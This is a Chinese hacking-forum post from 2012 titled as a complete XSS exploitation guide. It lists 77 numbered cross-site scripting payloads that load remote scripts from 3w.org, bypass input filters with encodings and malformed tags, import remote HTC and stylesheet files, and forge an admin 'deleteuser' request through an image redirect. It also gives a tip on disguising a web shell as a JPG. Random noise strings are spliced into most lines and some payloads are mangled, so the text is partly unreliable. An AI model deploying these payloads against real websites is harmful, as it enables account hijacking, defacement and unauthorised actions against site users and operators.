找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2237|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
跨站图片shell
2 g- N" m4 `! i3 {8 m4 F9 JXSS跨站代码  <script>alert("")</script>$ p( f1 z, H& ^# j! j
% E8 N& [! t' c, x$ _$ [' Y5 W  R1 T
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马# R# @3 Z! ?/ A
$ T  l' T4 b8 I' e5 K

2 N, Y% x# c3 ]7 h. O
* s' M2 \3 J( j2 _& E" G* c# b1)普通的XSS JavaScript注入3 S0 S$ g- P! V9 [, l( s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& X7 n2 U1 I# J* v+ V) b3 U# Y5 c# Z; l5 B7 _
(2)IMG标签XSS使用JavaScript命令
$ `, F( j$ V$ d<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 a# `7 z5 X/ [7 p

. J% ?& p& w+ s) ~(3)IMG标签无分号无引号3 I& S- @6 [& T. S' d( d% c- Q
<IMG SRC=javascript:alert(‘XSS’)>% n; p, N; ~! L5 V4 I

& F& A2 F- C: M; e! `7 S3 e: C(4)IMG标签大小写不敏感
) K- Y) P" h" U<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: K# B$ L1 w; Z, w4 m  c: Y" \( P$ c7 g
(5)HTML编码(必须有分号)/ n* h* _. {8 d6 x
<IMG SRC=javascript:alert(“XSS”)>% F0 O" i2 U& B. {' s) A

  y  f% z3 h, m; b(6)修正缺陷IMG标签2 O9 z8 l% z$ a% o$ N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>% j* x( C% @$ \* R% }# D
7 p! A7 S# L% M8 a+ G( Q5 j
(7)formCharCode标签(计算器)
3 Q  Z7 s1 v- Y3 B: M<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 p$ W% r" ]) A- N$ U

" E' h1 j) f9 D, e4 X' c3 E8 }(8)UTF-8的Unicode编码(计算器)
& V9 x3 X4 w  y* A<IMG SRC=jav..省略..S')>
. I' ~: R; \5 r# ^$ `0 J4 x4 d, j  `; |+ z% i% ]3 m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 i2 Q5 b9 p- t5 s% {6 K<IMG SRC=jav..省略..S')>" T* P- v  [4 j& t% R7 v. K0 v

6 _2 c6 S5 p- r' O9 j& L* P(10)十六进制编码也是没有分号(计算器)
# o  W/ |9 E  }! u: Q( \5 _<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>( \# A" l9 u$ ~0 [- e) K
# B) W; B" u1 C; O; `
(11)嵌入式标签,将Javascript分开
1 D: P+ a  h( j* j' V( M+ ]<IMG SRC=”jav ascript:alert(‘XSS’);”>" \1 o- V2 _7 u& e3 Z
0 w8 a! Y+ n' a4 Q2 M* w
(12)嵌入式编码标签,将Javascript分开. i# E0 C: F0 [4 ?. \8 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 g/ E- g: ?2 s

9 i% Q/ T* D. ^4 T$ `9 N(13)嵌入式换行符
6 |# H' W" {( Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 v1 j( l9 J  U
: P1 H; h1 k. m(14)嵌入式回车" s' c! v( S7 n, i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! Z) V& b4 b9 ?; F. a' C1 X# H8 w1 K
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 |* x; z- \0 X* X( s* |
<IMG SRC=”javascript:alert(‘XSS‘)”>
. D4 m- l. K8 `( j, Z: e, T' v: y% H; `' d1 }
(16)解决限制字符(要求同页面)
- d# X8 e& P& \( Q* V( C5 q<script>z=’document.’</script>
; j' ~! E$ ^$ ^2 S<script>z=z+’write(“‘</script>6 Z7 M/ d( w8 u4 ]; f+ U
<script>z=z+’<script’</script>! k& C7 A3 g: c' ]; X6 F' l
<script>z=z+’ src=ht’</script>, R% B% ?, W$ l
<script>z=z+’tp://ww’</script>
8 q. Q# h& R4 K  m. M+ g) m6 [2 E* ^; N<script>z=z+’w.shell’</script>
/ Y9 z/ f! b( j4 M<script>z=z+’.net/1.’</script>
  Q# R8 `, j0 p& Q) f2 Z, K8 b& }5 J, y<script>z=z+’js></sc’</script>
1 ^( i0 ?1 Z1 q) Q<script>z=z+’ript>”)’</script>
) `6 w& M  G, G/ r  }<script>eval_r(z)</script>! Z% D/ G9 s; Q+ z

( y8 l3 K( V- s# d" @/ `: J(17)空字符1 u' }7 |: E: R+ z8 h
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 \6 n8 e1 H. l4 l# s  z7 [& r3 n- |& K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 o3 p3 Z7 J/ q- D& s
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 a3 B# o( ~$ ^9 o, U7 r
  F6 Y' ]' |5 b! R
(19)Spaces和meta前的IMG标签* h4 y" m: _) n3 g
<IMG SRC=” javascript:alert(‘XSS’);”>1 x  d5 l8 L3 V" f- h
# Y" e! [8 U  z/ p5 [5 j- ?9 T) i
(20)Non-alpha-non-digit XSS
  q0 k# X$ @: u. {$ R<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. r; s7 h6 F: }4 _

( I9 k% }, P2 f8 F' k(21)Non-alpha-non-digit XSS to 2/ g/ b1 F( f6 I* A8 D
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 |, P; B/ |1 Z
7 R7 b/ N/ _' O8 T0 m# N
(22)Non-alpha-non-digit XSS to 38 ~3 S2 o; u6 F5 {$ R$ R! @- j
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ A( J8 S4 ~# W# C* i( Y* M9 \6 G2 z$ @0 k
(23)双开括号
3 p, }$ E* o, G+ ^- a( X<<SCRIPT>alert(“XSS”);//<</SCRIPT>+ z: A5 I7 N" K& q
4 o3 n0 H, g4 C9 u% v
(24)无结束脚本标记(仅火狐等浏览器)
6 i! l6 h9 C+ `4 V: M( L<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. W- W' B; Q4 f# f( G6 @& b/ c7 G# ~; l+ o* ?. Y$ S4 h
(25)无结束脚本标记2
% ]; f1 j4 V8 @# U# y<SCRIPT SRC=//3w.org/XSS/xss.js>  |& h0 A0 c! b% F
5 Q- L" x& q' I) @6 @# T1 G. n. ?
(26)半开的HTML/JavaScript XSS
( O  L. V: U% h4 j<IMG SRC=”javascript:alert(‘XSS’)”$ g. @/ M4 x9 J# h: Z* Z6 T

3 ?1 S0 V' Z: n4 B, @(27)双开角括号% m5 }" W3 k: ^
<iframe src=http://3w.org/XSS.html <
, L: c1 ^* Y0 P$ K/ Q  U- X! _! {3 w* {9 _0 }1 p2 v
(28)无单引号 双引号 分号- Y+ _; T! R+ }$ X
<SCRIPT>a=/XSS/
4 M- [  V6 L' _# o2 C5 Yalert(a.source)</SCRIPT>
, N+ m2 \9 f' H3 r9 |
) u7 H# j8 f; B! Y(29)换码过滤的JavaScript4 u2 H( a2 ]. w8 U
\”;alert(‘XSS’);//. A2 {% m' V1 m1 Z3 g7 L
6 e0 e% S5 r* X% a" K8 w
(30)结束Title标签: J9 k3 A" b% a6 t0 m. R
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 i/ \# g( L; q. F( v: L
) B+ g* T. ~2 o4 a; N" o
(31)Input Image9 W7 i% G" M+ a% t' |, H; Q
<INPUT SRC=”javascript:alert(‘XSS’);”>
5 l( I3 H4 m( A1 I; x6 F# r8 V. N" `" h$ Z$ c) c3 n% ^
(32)BODY Image/ {4 A; c& [# y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 }0 L$ F9 \4 E1 Q
% W+ z* l# _4 p0 K4 H, S& ~" g(33)BODY标签
5 m3 b9 T1 b7 V: G8 A4 m<BODY(‘XSS’)>2 d$ G1 _: j" F2 S0 K: V
! T0 S0 M9 G: ~# H9 ^. j/ [" T
(34)IMG Dynsrc! j  T6 M4 l* Z9 ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”># Z8 j* x5 q, q) |! Z/ \
+ C) }) l1 R: o( o! o' T3 [) {
(35)IMG Lowsrc
( s; A' v! t* u3 k0 [& f# G$ b; r# |/ I<IMG LOWSRC=”javascript:alert(‘XSS’)”># r8 ]4 c' f( O* s
3 i3 v5 t! w, Z1 G* X/ \
(36)BGSOUND
) e4 h/ s, p! `<BGSOUND SRC=”javascript:alert(‘XSS’);”>: \6 }$ S9 l" J7 A

% \+ U% V, C9 J3 R1 q  @0 |% T(37)STYLE sheet2 H5 }# @  v$ p, i5 Z- m8 b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 h5 A# e7 E+ i, c. v! l( ]+ O
. U7 _6 a5 o( E2 q- H( \  p7 F1 O(38)远程样式表
  P# Q0 Y6 r5 L  g. |  f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>% U/ H1 j9 i2 }, l; w: v

* |- Q! [  X, e; z(39)List-style-image(列表式)
# Z/ N2 T# i- `+ c<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
) h- `' r/ }. k3 G  Q
! P. B  p1 I% Q& D(40)IMG VBscript" P+ i+ r4 q* K8 r% @- L
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS6 m7 [) \+ b# e0 p$ u

. p8 k  k! z" q7 i& G- D(41)META链接url. E; s  B* s) {3 G8 m
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 u: s" a+ _' Q
- C" ^* B# b3 ](42)Iframe; C; x' U- z5 ~6 R
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
' Q+ j0 o: q& N6 n9 D(43)Frame
6 E" [" L; m9 ^# ]2 Q<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
: d- {5 ?3 X4 e* T7 @" @7 b, P1 X9 E% r! B  e5 I4 m, ^
(44)Table4 n2 D) A/ A- M; j
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% j9 q% Q$ E6 f/ G
$ J* ~4 ~$ P, ](45)TD5 G7 K, y% k/ y! ~" l+ b# L
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 E8 I5 z, p4 h8 d1 U" s! _% r3 i+ z, }# m8 F5 _6 Y
(46)DIV background-image
8 ?" |2 S  {! {0 Y6 q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 x, y) T# [0 `3 {* F6 q& O! o. L1 t9 H; M' P4 Q* y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)/ z5 j1 G$ b. _; e8 k9 S5 B! ^# F
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>0 l' m' m4 i9 t, E6 Z$ j4 }
$ }0 O: A, i+ b: t. ^
(48)DIV expression
1 g' P6 `4 u% a5 Z<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ a8 s3 v& ]! \. S6 g. r4 O" ^
2 i$ u7 q+ C( p# C7 ~(49)STYLE属性分拆表达) G! M$ O+ }( [3 i
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" P2 Q+ P9 r$ l: Q# N) V$ b% @$ G1 i' {2 L' S
(50)匿名STYLE(组成:开角号和一个字母开头), a/ s# Z+ ?) m  j) m! N8 g* G
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% M% n/ B- g* j# x0 j; R2 a6 K

8 w0 ^/ M3 j8 ?* @(51)STYLE background-image
8 ]$ F7 B1 u! |; t<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( h& m" H; l' X+ |/ p1 N5 y) {. x8 Z/ O% ~  t" G0 J
(52)IMG STYLE方式/ {" q, U7 e/ R! P2 P  [0 C
exppression(alert(“XSS”))’>
6 l- _, _( ^6 f' `& Z' o0 Z: v3 U- _+ K5 F4 ~4 U
(53)STYLE background
2 J: ?7 D  G# i* Y# Z  C8 H<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 k+ @/ B5 r$ I' u, p) H& H: n

" K4 e, @  @) p9 a% n+ i. J% f# q(54)BASE
& g  Z6 h% |: H1 n6 h. G3 y<BASE HREF=”javascript:alert(‘XSS’);//”>
* \  L- I7 r4 {1 @* q4 [# s6 o& E/ D$ W0 s- M  c. |' l
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 G. f5 q" z! ~! w+ e# a<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ K% t' T6 Q1 J. {  p9 U
7 K/ }$ w: I- x  y+ \# }4 j
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 Q% v& e! x% i, Wa=”get”;8 D/ F( j( a7 s/ z
b=”URL(\”";
* w! j2 e# h$ Vc=”javascript:”;
6 P% f  e& Y/ `6 Wd=”alert(‘XSS’);\”)”;
. B( ?8 ~% Q+ W( ]- B! s, D9 }eval_r(a+b+c+d);
- T1 b2 {2 ~! [( G% |6 ~
" F0 N# ?4 f7 ?# V0 ?! U(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上  ]1 J; R6 F1 F9 p
<HTML xmlns:xss>
0 `8 c7 \( ^: ~$ }& Y' Y6 e' k. D<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 \/ Z$ L% C1 g# m9 R<xss:xss>XSS</xss:xss>
0 c; Q( W# t! Y1 g4 Z4 w</HTML>
7 t( R! U: q$ o, Z' \/ b: F  V- u7 n& `
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; p6 Z- `% V7 U% G1 o<SCRIPT SRC=””></SCRIPT>: a" }9 W  T2 i3 A+ g4 @, f& C4 g

1 ]2 F) `5 [# J* Y: [0 r8 E(59)IMG嵌入式命令,可执行任意命令
/ l& }7 _( O6 x<IMG SRC=”http://www.XXX.com/a.php?a=b”>( i7 h0 o8 I  o7 a( K  @

2 `% P) Y+ H# o# T. W5 P( V1 b(60)IMG嵌入式命令(a.jpg在同服务器)
+ @6 Y* e0 F* tRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 }  v) |" a& h* [( m& w$ r! f7 m2 |' _% z4 x9 n
(61)绕符号过滤
/ i3 Q2 u* S  k2 b) H0 w8 `<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>  G8 w6 ]# m" j' R

8 ^' v/ D8 k& L* a(62)
( `9 o. e6 ^9 W$ n, \( n! m<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' E; O0 Q3 o, q1 {! B7 K' w) {; r& R" ^
(63)
# w# P" h! Q% ~+ Y6 a9 O; H<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>* E! s( Y8 l+ l' c" n

, P2 ~! X  N1 I! p$ l(64)! p1 i- U% N2 m3 d( X: a
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 V$ Y. ?( K- F5 X1 B& w
3 r6 F1 I* ]' U# Y
(65)2 n0 R9 L4 _- R0 x
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
# L& _! U- g& B1 J
4 k, w& Z; l9 Q9 A7 |8 F% Y8 @  p(66)
& @2 w' L) A) h<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 W( Q4 r1 I/ W+ L. W
3 q7 R) H* t* P. T. \(67)
3 P0 V0 g6 p' S5 p* r! p/ F/ H<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
' N' y" U2 Q+ C6 n) l
3 X+ C: X/ O; f7 e0 z. C(68)URL绕行1 ?% I: E9 k) {% r
<A HREF=”http://127.0.0.1/”>XSS</A>
  c6 u. p$ N# W1 O+ ~- k0 I' u- L; n0 G5 v; J# R
(69)URL编码
2 E. A2 [7 t  J: Q7 G<A HREF=”http://3w.org”>XSS</A>4 }6 ]. D/ ]" f. b
5 _% Q. o: w2 Z
(70)IP十进制/ ~( h% H5 T0 h) |/ R3 h- h: @
<A HREF=”http://3232235521″>XSS</A>
$ j( [+ ~9 R) f( L& s; I* l" T4 v' ^8 P: H4 u: B) g8 Q) |' z
(71)IP十六进制
3 ^5 m, Y, r2 L  o<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 G0 s. o, [( o& i3 Q; v% R

  q( q& @6 ~+ k+ N/ b2 W# U! ]: t/ t# g(72)IP八进制0 {) ]1 ?- S# A
<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 r( @: Q5 S5 s0 B0 ~+ W  l) \

- ?( B+ O' H, T8 o- `(73)混合编码6 A5 @1 V+ O9 N3 ~: k
<A HREF=”h( N$ W" \( F* J" ?" \# c
tt p://6 6.000146.0×7.147/”">XSS</A>$ ], C+ g) v. |1 e

( {3 f) B- M. ^4 ^, t+ q- f6 c! v(74)节省[http:]0 P( @. E" x6 V6 j% x- I2 c' ^
<A HREF=”//www.google.com/”>XSS</A>1 o; E5 J0 }+ A% N

$ j2 L+ Z+ I6 s(75)节省[www]
2 J+ o/ _; P6 s1 b3 q& _<A HREF=”http://google.com/”>XSS</A>
' G9 W( d4 X7 e& q6 L* ?) S& G
/ O& o1 c' m. u1 o; G& N4 |+ ]$ c(76)绝对点绝对DNS4 n8 w! a: Z! t# I0 D0 B* \+ G
<A HREF=”http://www.google.com./”>XSS</A>; |7 z0 Y  K) T4 L

! r. I4 h4 \- z1 F(77)javascript链接
9 Q4 Q+ r5 F  o6 p: z4 n<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
6 A: j; t9 r5 R. [! r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表